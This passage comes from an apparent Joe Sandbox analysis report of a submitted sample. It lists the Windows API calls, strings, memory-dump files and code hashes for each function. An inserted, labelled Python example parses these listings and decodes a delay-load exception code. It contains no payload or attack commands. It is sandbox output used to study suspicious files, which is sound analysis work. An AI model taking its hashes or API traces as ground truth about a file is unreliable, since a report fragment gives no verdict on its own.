                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2962429428-0
                                                                                                  • Opcode ID: edf2cd1fe782dd4ea2cb3ed54b595c6b591d976f87a31b9848b5fa250e3f33d0
                                                                                                  • Instruction ID: bcbcb6e87e5b6d700166c0b257ef3737ea959da2ca8e0d034611a9ddbc235f80
                                                                                                  • Opcode Fuzzy Hash: edf2cd1fe782dd4ea2cb3ed54b595c6b591d976f87a31b9848b5fa250e3f33d0
                                                                                                  • Instruction Fuzzy Hash: 18F082704D5B159FDB308A64C458B92B7ECAF12321F045B1ED0E6429E1D772698D9A40
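The "APIs" listings in the entries above all share one line shape: a bullet, an optional "Part of subcall function ADDR:" prefix, API.MODULE with an optional argument list, and the call-site address after "ref:". The following Python is an added example, not code from the Joe Sandbox report or from Joe Security: it parses that shape into records, separates the function's own calls from the subcall lines, and decodes the RaiseException code C06D0057 that the delay-load entries pass as first argument. The regular expression is inferred from the lines visible on this page and is an assumption, not a documented Joe Sandbox schema; the sample listing is constructed by copying lines from the entries above.

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox report.

Added example; not part of Joe Sandbox or of this report. The line format is
inferred from the entries on this page (an assumption, not a published schema).
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Shapes seen on the page:
#   • API.MODULE(arg,arg,...), ref: 0091E8E1
#   • API.MODULE ref: 0091E51F
#   • Part of subcall function 0091E85D: API.MODULE(...), ref: 0091E8E1
_LINE = re.compile(
    r"^\s*[•*-]\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_@]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]        # raw hex tokens; "?" means the sandbox could not resolve the value
    ref: int                     # address of the call site inside the memory dump
    subcall_of: Optional[int]    # address of the callee that makes this call, None if direct


def parse_api_listing(text: str) -> List[ApiCall]:
    """Turn listing lines into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m["args"]
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def direct_apis(calls: List[ApiCall]) -> List[str]:
    """APIs the function calls itself; subcall lines describe its callees, not the function."""
    return sorted({c.api for c in calls if c.subcall_of is None})


def module_histogram(calls: List[ApiCall]) -> Counter:
    """How many listed calls land in each module (KERNEL32, USER32, DELAYIMP, ...)."""
    return Counter(c.module for c in calls)


def decode_exception_code(code: int) -> dict:
    """Split an exception code laid out like an NTSTATUS value into its fields."""
    sev = (code >> 30) & 0x3
    return {
        "severity": {0: "success", 1: "informational", 2: "warning", 3: "error"}[sev],
        "customer": bool((code >> 29) & 1),
        "facility": (code >> 16) & 0x0FFF,   # bits 27..16
        "code": code & 0xFFFF,               # Win32 error number for facility 0x6D
    }


FACILITY_VISUALCPP = 0x6D   # delayimp.h: VcppException(sev, err) = sev | (0x6D << 16) | err


def delay_load_exceptions(calls: List[ApiCall]) -> List[Tuple[int, int]]:
    """(call-site, Win32 error) for RaiseException calls that use the Visual C++ facility.

    C06D0057 from the entries above decodes to error 0x57 = 87 = ERROR_INVALID_PARAMETER.
    """
    out = []
    for c in calls:
        if c.api != "RaiseException" or not c.args or c.args[0] == "?":
            continue
        d = decode_exception_code(int(c.args[0], 16))
        if d["facility"] == FACILITY_VISUALCPP:
            out.append((c.ref, d["code"]))
    return out


# Constructed input: lines copied from the report entries above.
SAMPLE_LISTING = """\
• ___delayLoadHelper2@8.DELAYIMP ref: 0091E51F
  • Part of subcall function 0091E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0091E8D0
  • Part of subcall function 0091E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0091E8E1
• CloseHandle.KERNELBASE(000000FF,?,?,009095D6,?,?,?,?,?,00932641,000000FF), ref: 0090963B
"""

if __name__ == "__main__":
    calls = parse_api_listing(SAMPLE_LISTING)
    print(direct_apis(calls))            # ['CloseHandle', '___delayLoadHelper2@8']
    print(module_histogram(calls))
    print(delay_load_exceptions(calls))
```

Decoding C06D0057 gives severity "error", facility 0x6D (FACILITY_VISUALCPP, the facility delayimp.h's VcppException macro uses) and Win32 error 87, ERROR_INVALID_PARAMETER; the three delay-load entries above are therefore the same delay-import helper, not three different failure paths. The subcall lines are kept separate from the function's own calls on purpose: they belong to 0091E85D and would otherwise inflate an API-based fingerprint of every function that goes through the helper.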
                                                                                                  APIs
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0091C2B1
                                                                                                  • EndDialog.USER32(?,00000006), ref: 0091C2C4
                                                                                                  • GetDlgItem.USER32(?,0000006C), ref: 0091C2E0
                                                                                                  • SetFocus.USER32(00000000), ref: 0091C2E7
                                                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0091C321
                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0091C358
                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0091C36E
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0091C38C
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0091C39C
                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0091C3B8
                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0091C3D4
                                                                                                  • _swprintf.LIBCMT ref: 0091C404
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0091C417
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0091C41E
                                                                                                  • _swprintf.LIBCMT ref: 0091C477
                                                                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0091C48A
                                                                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0091C4A7
                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0091C4C7
                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0091C4D7
                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0091C4F1
                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0091C509
                                                                                                  • _swprintf.LIBCMT ref: 0091C535
                                                                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0091C548
                                                                                                  • _swprintf.LIBCMT ref: 0091C59C
                                                                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0091C5AF
                                                                                                    • Part of subcall function 0091AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0091AF35
                                                                                                    • Part of subcall function 0091AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0093E72C,?,?), ref: 0091AF84
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                  • API String ID: 797121971-1840816070
                                                                                                  • Opcode ID: 40db2ce9338316655fd4a01c2a901321e3742d94181496e29f02c686e6d7bf58
                                                                                                  • Instruction ID: 8444a493f175edb206a4159dec6fc76dde1879a6068c3d565cc1ab7de4f96b8e
                                                                                                  • Opcode Fuzzy Hash: 40db2ce9338316655fd4a01c2a901321e3742d94181496e29f02c686e6d7bf58
                                                                                                  • Instruction Fuzzy Hash: BB91A7B229C348BFD221DBA0DD49FFB77ACEB8A704F044819F645D2081D775EA449B62
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00906FAA
                                                                                                  • _wcslen.LIBCMT ref: 00907013
                                                                                                  • _wcslen.LIBCMT ref: 00907084
                                                                                                    • Part of subcall function 00907A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00907AAB
                                                                                                    • Part of subcall function 00907A9C: GetLastError.KERNEL32 ref: 00907AF1
                                                                                                    • Part of subcall function 00907A9C: CloseHandle.KERNEL32(?), ref: 00907B00
                                                                                                    • Part of subcall function 0090A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0090977F,?,?,009095CF,?,?,?,?,?,00932641,000000FF), ref: 0090A1F1
                                                                                                    • Part of subcall function 0090A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0090977F,?,?,009095CF,?,?,?,?,?,00932641), ref: 0090A21F
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00907139
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00907155
                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00907298
                                                                                                    • Part of subcall function 00909DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,009073BC,?,?,?,00000000), ref: 00909DBC
                                                                                                    • Part of subcall function 00909DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00909E70
                                                                                                    • Part of subcall function 00909620: CloseHandle.KERNELBASE(000000FF,?,?,009095D6,?,?,?,?,?,00932641,000000FF), ref: 0090963B
                                                                                                    • Part of subcall function 0090A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A501
                                                                                                    • Part of subcall function 0090A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A532
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                  • API String ID: 3983180755-3508440684
                                                                                                  • Opcode ID: 821f0ae85ee6a1ed13461a5406ddecfc7d82ac7e814fd00841f00a64cbe0a043
                                                                                                  • Instruction ID: b61a9844d940a997a093324225469ea987bad56454e44f153ebffe75f3c5cafe
                                                                                                  • Opcode Fuzzy Hash: 821f0ae85ee6a1ed13461a5406ddecfc7d82ac7e814fd00841f00a64cbe0a043
                                                                                                  • Instruction Fuzzy Hash: 23C1C071D08604AEEB25DBB4DC81BEEF3ACAF44310F00455AF956E71C2D774BA848B61
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __floor_pentium4
                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                  • Opcode ID: 50af2d1170729a94c0ce4ff15d7712eca5576375799d86625fa10133c7aca8d7
                                                                                                  • Instruction ID: 6fbcd172af84cd41fcddc18ce9a950e8953b55cfd5a0aa4e9bdf07509acd5ff8
                                                                                                  • Opcode Fuzzy Hash: 50af2d1170729a94c0ce4ff15d7712eca5576375799d86625fa10133c7aca8d7
                                                                                                  • Instruction Fuzzy Hash: 1EC24E71E096388FDB25CE28ED807EAB7B9EB44305F1545EAD44DE7244E778AE818F40
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog_swprintf
                                                                                                  • String ID: CMT$h%u$hc%u
                                                                                                  • API String ID: 146138363-3282847064
                                                                                                  • Opcode ID: f20c956416452a83f9fe6afd7883d967582a27f00775529d3de7f48ff43c598f
                                                                                                  • Instruction ID: 82a3aeaceb1ec6c3f063e10cad37a2f7ca27d188042031d51e9bce9ba5b56fd1
                                                                                                  • Opcode Fuzzy Hash: f20c956416452a83f9fe6afd7883d967582a27f00775529d3de7f48ff43c598f
                                                                                                  • Instruction Fuzzy Hash: 7332B471614384AFDB14DF74C896BE93BA9AF55300F04857DFD8A8B2C2DB749A49CB20
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00902874
                                                                                                  • _strlen.LIBCMT ref: 00902E3F
                                                                                                    • Part of subcall function 009102BA: __EH_prolog.LIBCMT ref: 009102BF
                                                                                                    • Part of subcall function 00911B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0090BAE9,00000000,?,?,?,00010464), ref: 00911BA0
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00902F91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                  • String ID: CMT
                                                                                                  • API String ID: 1206968400-2756464174
                                                                                                  • Opcode ID: a6e4c6680f2d38d1ae473c7eeac921ac764759365bbb2a089bcfd2222f8e76b2
                                                                                                  • Instruction ID: e312cbe3e87fad463b449a1c716c0f188f8c91410c05221299345e3fbf6ee7b2
                                                                                                  • Opcode Fuzzy Hash: a6e4c6680f2d38d1ae473c7eeac921ac764759365bbb2a089bcfd2222f8e76b2
                                                                                                  • Instruction Fuzzy Hash: 9462F6716003458FDF19DF38C88A7EA3BA5AF55300F08857EED9A8B2C2DB759945CB60
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0091F844
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0091F910
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0091F930
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0091F93A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                  • String ID:
                                                                                                  • API String ID: 254469556-0
                                                                                                  • Opcode ID: ec3852d879d2b79690527b777d6f4a3a015b79052c8d7497377670ba1ff36508
                                                                                                  • Instruction ID: 91776bb4d66a3711cfd015ad1cc588b4ec8bd0659ec8327417f1a33adcabbf1b
                                                                                                  • Opcode Fuzzy Hash: ec3852d879d2b79690527b777d6f4a3a015b79052c8d7497377670ba1ff36508
                                                                                                  • Instruction Fuzzy Hash: 27312975D4521DDBDB21DFA4D9897CCBBB8AF08304F1040EAE40DAB250EB759B859F44
                                                                                                  APIs
                                                                                                  • VirtualQuery.KERNEL32(80000000,0091E5E8,0000001C,0091E7DD,00000000,?,?,?,?,?,?,?,0091E5E8,00000004,00961CEC,0091E86D), ref: 0091E6B4
                                                                                                  • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0091E5E8,00000004,00961CEC,0091E86D), ref: 0091E6CF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                   • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                   • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoQuerySystemVirtual
                                                                                                  • String ID: D
                                                                                                  • API String ID: 401686933-2746444292
                                                                                                  • Opcode ID: ca670b23b9add8be6cc32bf8ade21eb3f468b796f9f2f6cda475e3a6952e6c30
                                                                                                  • Instruction ID: 08faa665430d767dae411648b012171240a796713ed56b1c1f722e84bb492726
                                                                                                  • Opcode Fuzzy Hash: ca670b23b9add8be6cc32bf8ade21eb3f468b796f9f2f6cda475e3a6952e6c30
                                                                                                  • Instruction Fuzzy Hash: B601D4327401096BDF14DE69DC09ADD7BAAAFC4324F0CC120ED19D7150D638DD458680
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00928FB5
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00928FBF
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00928FCC
Memory Dump Source
• Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0091AF35
• GetNumberFormatW.KERNEL32(00000400,00000000,?,0093E72C,?,?), ref: 0091AF84
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• API String ID: 2169056816-0
APIs
• GetLastError.KERNEL32(00906DDF,00000000,00000400), ref: 00906C74
• FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00906C95
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009319EF,?,?,00000008,?,?,0093168F,00000000), ref: 00931C21
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0091F66A
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
APIs
• GetVersionExW.KERNEL32(?), ref: 0090B16B
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
Strings
Similarity
• API ID:
• String ID: gj
• API String ID: 0-4203073231
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0091F3A5), ref: 0091F9DA
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
                                                                                                  • Opcode ID: c647cbcfac7ca5e00763d983f98d2e361d1a0c4d234aabd7e619cc0f6aa54dd0
                                                                                                  • Instruction ID: 30b3f11e90c2b4940db586e2d1e65228f57e4852a56827c9fcede550364cd32d
                                                                                                  • Opcode Fuzzy Hash: c647cbcfac7ca5e00763d983f98d2e361d1a0c4d234aabd7e619cc0f6aa54dd0
                                                                                                  • Instruction Fuzzy Hash: 3BA0113022E2008B83008F30AE082083AAAAA00282308802AA008C8020EAA080A0BB00
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                  • Instruction ID: 5d358d301347239c2444b941c55cf7cd28226e6b6565943af8cc6ec6351a4aaf
                                                                                                  • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                  • Instruction Fuzzy Hash: A362C871B047899FCB25CF28C4906F9BBE1AF95304F08896DD8EA8B346D734E985CB11
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                  • Instruction ID: da6283a229f013bef24258c7cef7d10690ab0dfd97fa037107024078f86b7c46
                                                                                                  • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                  • Instruction Fuzzy Hash: 0C62C57170C34A9FCB15CF68C8806A9FBF1AF95304F18896DE89A8B346D730E985CB55
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
